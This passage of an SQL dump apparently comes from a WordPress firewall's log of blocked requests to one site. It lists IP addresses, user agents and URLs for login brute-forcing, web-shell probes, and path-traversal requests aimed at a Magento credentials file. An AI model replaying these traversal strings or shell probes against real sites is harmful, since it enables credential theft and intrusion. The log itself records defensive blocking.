Safari\\/537.36\"}','QbLs9pGgKFOJH0ZIkSX37qaD',0,1665722033.8593,493,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','E48hpHmeoxI3Bw7nrKDOqu5F',0,1665722027.2622,3402,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','pf2qlhN50jy7sQGvJ93zAMUX',0,1665722023.6328,7010,'','POST',403,0,515,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','cvSJDUnqkwaMXg13ACOBKFbj',0,1665721667.8663,18087,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','Cey26gu8B7JUnwH05voWpPaK',0,1665720132.3973,17541,'','POST',403,0,600,0,1,'',0),('159.89.109.117',2673438069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','T7S6dhRMgwC5Vyj0uOqBmJes',0,1665726438.5747,636,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','bKBWXhM6AVwnU7qzQJrTPH25',0,1665724960.7787,18201,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','4DS0EYzUVoTf7wsCrIqLORt9',0,1665724079.6226,1628,'','POST',403,0,600,0,1,'',0),('142.132.134.40',2391049768,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','jaKd1v0GUr8mRX9LqsTuNnl5',0,1665723986.6444,542,'','POST',403,0,515,0,1,'',0),('103.155.93.241',1738235377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','SpnFhYxa86EUJewAsliMP5qW',0,1665723976.5136,511,'','POST',403,0,515,0,1,'',0),('77.243.228.84',1307829332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','ncrCGxFDUu720viWdOzkAaLP',0,1665723980.6474,496,'','POST',403,0,515,0,1,'',0),('116.202.128.32',1959428128,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','CzhJfq2iu0cajvkDASKPBGQN',0,1665723965.5445,596,'','POST',403,0,515,0,1,'',0),('182.61.51.214',3057464278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','dThBVaLzKjQbo2kwlRxYMA3p',0,1665723958.0335,648,'','POST',403,0,515,0,1,'',0),('185.216.119.106',3117971306,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','CaLW58D9nR34BFVEmiQeJf6T',0,1665723960.1226,485,'','POST',403,0,515,0,1,'',0),('67.205.176.79',1137553487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','7HaGVEqZxU0myIelo6Q5cgjz',0,1665723946.9639,1303,'','POST',403,0,515,0,1,'',0),('51.159.77.133',866078085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','2euAwODMWyGoFkJXZi1zpdVL',0,1665723951.0126,538,'','POST',403,0,515,0,1,'',0),('51.79.207.190',860868542,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','fwJ1L5EvcDAHNdxPmzBq82KM',0,1665729773.5073,2906,'','POST',403,0,515,0,1,'',0),('194.163.163.7',3265504007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','CylsJHGt30mEzxqa62gPXSrO',0,1665729773.8111,2476,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','OkaXHlhoRCmI21ENfJcsxgAy',0,1665729758.2811,1319,'','POST',403,0,515,0,1,'',0),('132.232.6.17',2229798417,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','3eAo59W4GQ8OBthRiqKI2lyz',0,1665729745.3033,1710,'','POST',403,0,515,0,1,'',0),('157.230.15.115',2649100147,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','yMaQiZltJoP1NELkB3VH9Gu6',0,1665729713.6424,17934,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','t2NMEKzXrqgBsbU4RiSH0e7Y',0,1665729371.5164,17083,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','J7pHUNrCFzLGlVIhO9bfB0s5',0,1665728818.8204,19689,'','POST',403,0,600,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','pjUsXvkYQWb3nNgTFo4PH9Zi',0,1665727307.4253,17407,'','POST',403,0,600,0,1,'',0),('82.165.87.63',1386567487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','DPLEafNHl2KmSQUub3TJ0CcO',0,1665731695.1592,18539,'','POST',403,0,515,0,1,'',0),('2.59.119.2',37451522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','n4WIeZhzxiK5tfJNpLEdB9jS',0,1665731713.7113,3596,'','POST',403,0,515,0,1,'',0),('156.67.211.101',2621690725,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','rQjCElHovaBsJNuDpqmG8LFi',0,1665731698.1436,15484,'','POST',403,0,515,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','o4QlebWEF9NKUyZ2RaXM5HPj',0,1665731255.5433,18830,'','POST',403,0,600,0,1,'',0),('8.142.173.121',143568249,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','uvtrLoMZcs5fJpIQRWHe7DgO',0,1665736157.3083,1612,'','POST',403,0,600,0,1,'',0),('159.223.170.181',2682235573,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','9pfAM5dPkYrFVjxCHn6cgITB',0,1665737062.8010,8004,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','hSkIv08gpKTsqef9VAy5LOFr',0,1665734599.3874,1300,'','POST',403,0,600,0,1,'',0),('193.148.16.211',3247706323,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rdEK4L9XVFlqo8nfhsbZjpQv',0,1665735171.4672,18522,'','POST',403,0,515,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','EWjaS9C8RYPoeTg0MHfl24Kb',0,1665742031.9904,18555,'','POST',403,0,600,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','scI327n6jgDwhPQfHyNYR5i1',0,1665741112.2449,17683,'','POST',403,0,600,0,1,'',0),('184.75.223.211',3091980243,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LRCA1sFgiNIcdw8q5x47SpzK',0,1665740647.5184,1489,'','POST',403,0,515,0,1,'',0),('178.162.212.214',2997015766,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BEqeP67aV3xrXm2bjdy4vNp8',0,1665740579.7680,19954,'','POST',403,0,515,0,1,'',0),('103.129.222.91',1736564315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','ni4D6bZuAVex51a8JcBgpSMl',0,1665738626.1303,17749,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','sQT9lzcLDBfXeV3rRO1vY20h',0,1665746122.8490,17902,'','POST',403,0,600,0,1,'',0),('46.63.80.162',775901346,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','iAp7leL04PKk18u56VtsQzvm',0,1665744541.2999,17967,'','POST',403,0,600,0,1,'',0),('115.78.122.58',1934522938,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','y6kgPZCdLTIK3H7wF2Me9frx',0,1665743616.4409,18136,'','POST',403,0,600,0,1,'',0),('213.152.161.219',3583549915,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fzet1MpE9HY04ZyXPAx5aKwD',0,1665742721.8391,20023,'','POST',403,0,515,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','WV4UrI0qxiBGCwtFhb6akpQe',0,1665748652.5813,17463,'','POST',403,0,600,0,1,'',0),('199.249.230.37',3355043365,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ez1fVEK9H6a4IYAmWRtoU28g',0,1665748079.9516,19100,'','POST',403,0,515,0,1,'',0),('184.75.223.227',3091980259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','H1zhuLSb3v4wecCt89DKsmMA',0,1665747244.4775,18863,'','POST',403,0,515,0,1,'',0),('139.59.96.126',2335924350,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','9YS78wRAVplErh6nHaNiLq5I',0,1665747067.0704,18408,'','POST',403,0,600,0,1,'',0),('194.169.175.22',3265900310,'','https://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rAtKFLOufb1w9VMpNqnohB7G',0,1665746544.6414,11883,'','GET',403,0,700,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','MP2cd8ReLJnV7kOUKafN5bGl',0,1665752111.9475,18246,'','POST',403,0,600,0,1,'',0),('188.166.225.235',3165053419,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','SRH4rwxV6dukopTDBah5zlNX',0,1665749592.4249,4646,'','POST',403,0,600,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','wY5SOaBsHZTujXAzoUR2gkyJ',0,1665751178.5846,18119,'','POST',403,0,600,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','XOhRVu8oI1YW2PUkjEKDf7am',0,1665749248.2088,528,'','POST',403,0,600,0,1,'',0),('185.9.19.107',3104379755,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xJoHkbt4uFOAw5Iv2eDpzSdG',0,1665755533.0035,2100,'','POST',403,0,515,0,1,'',0),('213.152.161.240',3583549936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PNfrOkbaHUi08Xo2wedjgqS1',0,1665755350.5876,2441,'','POST',403,0,515,0,1,'',0),('104.41.221.5',1747574021,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','hd1HJTC8bADE6rNBMkVQLF5p',0,1665753714.9233,17785,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','r9FQYDo0M7lIbAHh8m412qBT',0,1665753024.8639,486,'','POST',403,0,600,0,1,'',0),('54.37.81.45',908415277,'','http://cteisys.com/about.php?520=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','Jq2nLseufKDyG9pcHY4ExW8k',0,1665759331.6407,507,'','GET',403,0,700,0,1,'',0),('171.22.30.253',2870353661,'','http://cteisys.com/magmi/web/download_file.php?file=../../app/etc/local.xml','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.11 (KHTML, like Gecko) Chrome\\/23.0.1271.64 Safari\\/537.11\"}','dC78N4fgouqWOs2k0Bp3A9nK',0,1665764514.4644,3104,'','GET',403,0,700,0,1,'',0),('107.189.13.99',1807551843,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','odFwaxSOJAcNyhHV6l4v8UEX',0,1665761621.1968,1065,'','POST',403,0,600,0,1,'',0),('171.22.30.253',2870353661,'','http://cteisys.com/magmi-importer/web/download_file.php?file=../../app/etc/local.xml','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.11 (KHTML, like Gecko) Chrome\\/23.0.1271.64 Safari\\/537.11\"}','zvGg3yJETR2Zh8iAnlMSIrkL',0,1665764508.1511,5133,'','GET',403,0,700,0,1,'',0),('209.141.37.194',3515688386,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','rwUX8mveV6qcWpNykY51JOCj',0,1665766257.6919,1226,'','POST',403,0,600,0,1,'',0),('20.19.122.234',336820970,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','LgFiepDK4wZo08n1kRtvGIrm',0,1665768499.1586,340,'','GET',403,0,700,0,1,'',0),('20.19.122.234',336820970,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','JYOVu9EcK8o23dfpFl1nXaQ7',0,1665768485.4810,11764,'','GET',403,0,700,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','x89V0Tqki1z7oBFDlnvEMs5u',0,1665767356.5322,462,'','POST',403,0,600,0,1,'',0),('178.238.229.54',3002000694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Bu4zqFbSwhDs9KfnN62LodxH',0,1665767083.3053,18704,'','POST',403,0,515,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','HjyR8aQYkur4O7PnL2CBUZdh',0,1665798773.1083,274,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','293qGeSjNZxkhuHMWJrzI7Yn',0,1665798770.9267,295,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/wp-queryall.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OPAUITR7w0s5khnBta3Gpv8j',0,1665798772.0025,284,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','AZqkPKlywCdY4BLgUexiz9Q2',0,1665798768.7200,294,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Wg8lDqR0mw3oEd5nL7MeCBQ1',0,1665798769.8229,311,'','GET',403,0,700,0,1,'',0),('185.200.117.131',3116922243,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0pJ81F2MTlLxw3oySGqXhNrn',0,1665773099.0823,19138,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vdXIYjziOxghrwk2A9nPEJU8',0,1665774255.3222,12913,'','POST',403,0,515,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','tniRDBWwrfy7PCoTAdGEV9Qh',0,1665798767.5130,293,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','dxwB5kbn3lae4sQ0R7uvojMD',0,1665798766.4075,297,'','POST',403,0,700,0,1,'',0),('213.152.186.19',3583556115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zqQVu9XskOZim3NMtYGI2AEj',0,1665775946.9884,19271,'','POST',403,0,515,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3phENatI0nTlVqrUgyZmJYA8',0,1665798765.3359,307,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qPJ62t5urIksfYGniZLTlv7D',0,1665798764.2494,287,'','POST',403,0,515,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/xmlrpc.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','coUHliDMEapv5ktmXr2snPj4',0,1665798763.1822,289,'','GET',403,0,515,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','inu9oDsLpbYPBfzZVEwkyJ3H',0,1665798762.0831,322,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FaEuRmBhMdZCVv1DJne5q4fG',0,1665798760.8911,319,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','CgwdXAGz1hY9uQoDFWBOUImN',0,1665798759.8177,285,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','lhv1p2BoSLqiOFes5ucd8ZRj',0,1665798758.6718,278,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Qmlc5POXxzFhtM7p839TSKGb',0,1665798757.6014,285,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OSGxT7QoyspZ0EX3WICMPwuK',0,1665798756.4312,267,'','GET',403,0,700,0,1,'',0),('193.37.254.35',3240492579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 